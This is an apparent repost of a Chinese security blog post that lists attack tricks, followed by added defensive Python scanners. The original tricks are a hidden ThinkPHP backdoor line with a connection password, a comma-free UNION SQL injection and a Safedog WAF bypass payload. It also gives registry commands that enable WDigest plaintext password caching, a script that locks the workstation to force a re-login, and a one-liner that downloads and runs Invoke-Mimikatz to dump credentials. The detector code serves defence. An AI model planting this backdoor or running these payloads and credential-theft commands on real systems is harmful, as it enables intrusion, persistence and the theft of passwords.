http://www.heresec.com, you deserve it
Leaving a backdoor in the ThinkPHP framework:
Pick any controller and add the line
I('post.heresec', '', I('get.i'));  // the third argument of I() is the filter callback; here it is read from the GET parameter i
Connection method: http://xxxx/xxxx?i=assert
Password: heresec
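Defenders auditing a ThinkPHP 3.x code base can look for exactly this shape: an I() call whose third (filter) argument is itself request-derived rather than a fixed function name. The scanner below is an added example written for this page, not code from the original post; it assumes the ThinkPHP 3.x signature I($name, $default, $filter) and runs over a constructed sample controller embedded in the block.

```python
import re

# Constructed ThinkPHP 3.x controller source (sample data for this example, not from the post)
SAMPLE_CONTROLLER = r'''<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index() {
        $name = I('get.name', '', 'htmlspecialchars');   // normal: fixed filter
        $page = I('post.page', 1, 'intval');
        I('post.heresec', '', I('get.i'));               // backdoor: filter comes from request
        $x = I("post.cmd", "", $_GET['f']);              // variant: filter from superglobal
        $this->display();
    }
}
'''

# Anything that reads request data: a nested I() call or a PHP superglobal.
TAINT = re.compile(r'(?<![\w$])I\s*\(|\$_(GET|POST|REQUEST|COOKIE)\b|\$_SERVER\b')


def _split_top_level_args(argstr):
    """Split a PHP argument list on commas that sit outside parentheses and
    string literals (escaped quotes inside strings are not handled)."""
    args, depth, buf, quote = [], 0, [], None
    for ch in argstr:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
            continue
        if ch in ('"', "'"):
            quote = ch
        elif ch == '(':
            depth += 1
        elif ch == ')':
            depth -= 1
        elif ch == ',' and depth == 0:
            args.append(''.join(buf).strip())
            buf = []
            continue
        buf.append(ch)
    if buf:
        args.append(''.join(buf).strip())
    return args


def _extract_calls(src):
    """Yield (line_no, argument_text) for every I( ... ) call, matching
    balanced parentheses so nested calls are captured whole."""
    for m in re.finditer(r'(?<![\w$])I\s*\(', src):
        start = m.end()
        depth, i, quote = 1, start, None
        while i < len(src) and depth:
            ch = src[i]
            if quote:
                if ch == quote:
                    quote = None
            elif ch in ('"', "'"):
                quote = ch
            elif ch == '(':
                depth += 1
            elif ch == ')':
                depth -= 1
            i += 1
        if depth == 0:
            yield src.count('\n', 0, m.start()) + 1, src[start:i - 1]


def find_request_controlled_filters(src):
    """Return [(line_no, filter_arg)] for I() calls whose filter argument is
    request-derived: the filter is applied to the fetched value as a callback,
    so a request-controlled filter name means request-controlled code execution."""
    hits = []
    for line_no, argstr in _extract_calls(src):
        args = _split_top_level_args(argstr)
        if len(args) >= 3 and TAINT.search(args[2]):
            hits.append((line_no, args[2]))
    return hits


if __name__ == '__main__':
    for line_no, arg in find_request_controlled_filters(SAMPLE_CONTROLLER):
        print(f'line {line_no}: request-controlled I() filter -> {arg}')
```

Run it over every file under Application/*/Controller; the two flagged lines in the sample are the pattern from the post and a variant that pulls the filter straight from $_GET. A fixed-string filter ('intval', 'htmlspecialchars') is not reported.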
Source: www.leavesongs.com
Injection when commas are filtered:
127' UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e)#
Equivalent to 127' union select 1,2,3,4,5
Grabbing plaintext passwords on Windows Server 2012
First set the value "UseLogonCredential" under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to 1 (it must be of type DWORD, 32-bit, for this to work); the next time a user logs on, the plaintext password is recorded.
Via cmd:
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Via PowerShell:
PS C:\> New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
Lock the machine with PowerShell, so that the administrator has to log on again:
PS C:\> Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
One-liner to grab plaintext passwords:
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
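The registry change above is the control point for this whole technique, so it is also the thing to audit. The Python below is an added example for this page, not code from the original post: it parses the output of `reg query` on the WDigest key (constructed sample output is embedded) and reports whether plaintext credential caching is on. It assumes the Windows 8.1 / Server 2012 R2 default, where an absent value means caching is disabled; the absent_means_enabled switch is an assumption the caller makes about older systems patched with KB2871997, which only honour an explicit 0.

```python
import re

# Constructed `reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest`
# output for a host where caching has been switched on (sample data for this
# example, not output captured from the original post).
REG_QUERY_ENABLED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Debuglevel    REG_DWORD    0x0
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
    UTF8SASL    REG_DWORD    0x1
    DigestEncryptionAlgorithms    REG_SZ    3des,rc4
    UseLogonCredential    REG_DWORD    0x1
"""

# Same key on a host still at the default configuration (value absent).
REG_QUERY_DEFAULT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Debuglevel    REG_DWORD    0x0
    Negotiate    REG_DWORD    0x0
    UTF8HTTP    REG_DWORD    0x1
    UTF8SASL    REG_DWORD    0x1
    DigestEncryptionAlgorithms    REG_SZ    3des,rc4
"""

WDIGEST_KEY = r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
# `reg query` prints each value indented: <name>    <REG_TYPE>    <data>
VALUE_LINE = re.compile(r'^\s+(\S+)\s+(REG_\w+)\s+(.*)$')


def parse_reg_query(text):
    """Parse `reg query` output into {value_name: (type, data)}; the key line
    itself is not indented and is skipped."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            name, rtype, data = m.groups()
            values[name] = (rtype, data.strip())
    return values


def audit_wdigest(text, absent_means_enabled=False):
    """Decide whether WDigest will keep plaintext logon credentials in LSASS.

    absent_means_enabled=False models Windows 8.1 / Server 2012 R2 and later,
    where a missing UseLogonCredential value means caching is off. Pass True
    for older systems patched with KB2871997, which need an explicit 0
    (an assumption about the fleet that the caller states).
    """
    entry = parse_reg_query(text).get('UseLogonCredential')
    if entry is None:
        state, exposed = 'absent', absent_means_enabled
    else:
        rtype, data = entry
        state = data
        exposed = rtype == 'REG_DWORD' and int(data, 16) != 0
    report = {'use_logon_credential': state, 'plaintext_exposed': exposed}
    if exposed:
        # Remediation: write an explicit 0. It applies to subsequent logons;
        # sessions that already cached a credential keep it until they end.
        report['fix'] = (f'reg add {WDIGEST_KEY} /v UseLogonCredential '
                         f'/t REG_DWORD /d 0 /f')
    return report


if __name__ == '__main__':
    print(audit_wdigest(REG_QUERY_ENABLED))
    print(audit_wdigest(REG_QUERY_DEFAULT))
```

Beyond a periodic check, put a SACL on the WDigest key and collect Event ID 4657 (registry value modified) from the Security log: the `reg add` / New-ItemProperty step in the post is an attacker action that precedes the credential grab by a full logon cycle, which leaves time to respond.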
The Safedog bypass discussed on 90sec seems to be an old method by now; 'from' is still blocked.
Still, if you are doing security assessments for enterprises, it can come in handy:
/*!50000union/*!*//*!50000select/*!*/1,2,3,4,current_user,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
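Both SQL tricks on this page (the comma-free UNION built from JOINed derived tables, and the /*!50000 version-comment form used against Safedog) defeat a filter that looks for a literal keyword or a comma. A detector has to normalise the request first and then match on structure. The Python below is an added example for this page, not code from the original post or from any WAF; it runs over constructed request lines embedded in the block and uses the page's two payload shapes as the positive cases.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log request lines (sample data for this example, not from the post)
SAMPLE_REQUESTS = [
    "GET /item.php?id=127 HTTP/1.1",
    "GET /item.php?id=127'%20UNION%20SELECT%20*%20FROM%20((SELECT%201)a%20JOIN%20(SELECT%202)b%20JOIN%20(SELECT%203)c)%23 HTTP/1.1",
    "GET /item.php?id=1/*!50000union/*!*//*!50000select/*!*/1,2,3,current_user,5 HTTP/1.1",
    "GET /search.php?q=union%20station%20opening%20hours HTTP/1.1",
]

VERSION_COMMENT_OPEN = re.compile(r'/\*!\d*')        # "/*!50000" or bare "/*!"
BLOCK_COMMENT = re.compile(r'/\*.*?\*/', re.S)       # ordinary /* ... */
STRAY_CLOSE = re.compile(r'\*/')                     # "*/" left after the step above


def normalize(query):
    """URL-decode, then strip MySQL comment syntax. /*!50000union*/ executes as
    UNION on MySQL, so the keyword must survive while the markers are dropped;
    the version-comment opener is removed first so the block-comment pass
    cannot swallow the keyword together with the markers."""
    s = unquote_plus(query)
    s = VERSION_COMMENT_OPEN.sub(' ', s)
    s = BLOCK_COMMENT.sub(' ', s)
    s = STRAY_CLOSE.sub(' ', s)
    return re.sub(r'\s+', ' ', s).strip().lower()


UNION_SELECT = re.compile(r'\bunion\b(\s+all)?\s+select\b')
# (SELECT 1)a JOIN (SELECT 2)b ...: the comma-free column-count trick
DERIVED_JOIN = re.compile(r'\(\s*select\s+\d+\s*\)\s*\w+\s+join\s*\(\s*select\s+\d+\s*\)')


def classify(request_line):
    """Return the set of indicator tags found in one request line."""
    tags = set()
    m = re.search(r'\?(\S*)', request_line)
    if not m:
        return tags
    raw = m.group(1)
    norm = normalize(raw)
    if UNION_SELECT.search(norm):
        tags.add('union-select')
    if DERIVED_JOIN.search(norm):
        tags.add('comma-less-union')
    if VERSION_COMMENT_OPEN.search(unquote_plus(raw)):
        tags.add('version-comment')
    return tags


def scan(lines):
    """Map each suspicious request line to its sorted indicator tags."""
    result = {}
    for line in lines:
        tags = classify(line)
        if tags:
            result[line] = sorted(tags)
    return result


if __name__ == '__main__':
    for line, tags in scan(SAMPLE_REQUESTS).items():
        print(tags, line)
```

The benign "union station" query is not reported because the structural rule requires UNION followed by SELECT, which is the reason to match on structure after normalisation rather than on keywords in the raw string. Double URL-encoding and other comment dialects would need further normalisation passes in the same place.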
Article from: http://www.heresec.com/index.php/archives/95/
This article was first published on the WeChat official account (follow 安全技术): "还是一些东西" (Still a few things).